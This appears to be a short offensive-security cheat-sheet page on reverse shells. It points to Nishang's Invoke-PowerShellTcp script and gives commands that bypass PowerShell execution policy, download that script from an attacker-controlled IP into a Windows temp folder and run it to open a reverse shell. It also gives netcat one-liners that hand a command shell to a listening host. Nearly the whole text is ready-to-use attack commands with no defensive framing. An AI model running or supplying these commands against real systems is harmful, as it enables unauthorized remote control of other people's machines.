Reverse Shells

Nishang

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Add line to ending:

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.1 -Port 80

cmd.exe /c powershell.exe -ep bypass Invoke-WebRequest -Uri 'http://192.168.1.1/Invoke-PowerShellTcp.ps1' -OutFile 'C:\Windows\Temp\s.ps1'

cmd.exe /c powershell.exe -ep bypass -File C:\Windows\Temp\s.ps1"

Netcat

nc -e {shell} {LHOST} {LPORT}
nc.exe -e cmd 192.168.1.1 80

Last updated